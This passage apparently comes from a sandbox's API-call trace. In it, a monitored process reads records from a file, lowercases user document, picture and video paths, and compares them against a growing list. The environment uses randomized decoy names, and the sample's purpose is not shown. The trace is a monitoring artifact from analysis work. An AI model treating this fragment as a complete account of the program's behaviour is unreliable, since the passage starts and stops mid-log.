lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 99 [0085.732] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.732] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 1 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 1 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.733] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 0x62 [0085.733] SetFilePointer (in: hFile=0x9c, lDistanceToMove=22400, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5780 [0085.733] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.733] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.733] SetFilePointer (in: hFile=0x9c, lDistanceToMove=22400, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5780 [0085.733] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.733] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/0MGUK_Iy.odt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt" [0085.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 73 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned -1 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned -1 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned -1 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.733] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 0x48 [0085.733] SetFilePointer (in: hFile=0x9c, lDistanceToMove=22656, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5880 [0085.733] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.733] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.733] SetFilePointer (in: hFile=0x9c, lDistanceToMove=22656, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5880 [0085.733] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.733] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/rI2TsF%20ElIz.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png" [0085.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned 106 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 1 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 1 [0085.733] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 1 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 1 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.734] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned 0x69 [0085.734] SetFilePointer (in: hFile=0x9c, lDistanceToMove=22912, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5980 [0085.734] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.734] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.734] SetFilePointer (in: hFile=0x9c, lDistanceToMove=22912, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5980 [0085.734] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.734] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/dEUUJNf811ulfl.pptx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx" [0085.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 65 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned -1 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 1 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned -1 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned -1 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned -1 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.734] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 0x40 [0085.734] SetFilePointer (in: hFile=0x9c, lDistanceToMove=23168, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5a80 [0085.734] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.734] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.734] SetFilePointer (in: hFile=0x9c, lDistanceToMove=23168, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5a80 [0085.734] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.734] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/Uj4X.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots" [0085.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned 92 [0085.734] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.735] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned 0x5b [0085.735] SetFilePointer (in: hFile=0x9c, lDistanceToMove=23424, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b80 [0085.735] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.735] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.735] SetFilePointer (in: hFile=0x9c, lDistanceToMove=23424, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b80 [0085.735] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.735] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/INEFsuw.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots" [0085.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 63 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned -1 [0085.735] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned -1 [0085.735] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 0x3e [0085.735] SetFilePointer (in: hFile=0x9c, lDistanceToMove=23680, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5c80 [0085.735] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.735] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.735] SetFilePointer (in: hFile=0x9c, lDistanceToMove=23680, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5c80 [0085.735] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.736] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/aUSvDDs.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv" [0085.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned 54 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.736] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned 0x35 [0085.736] 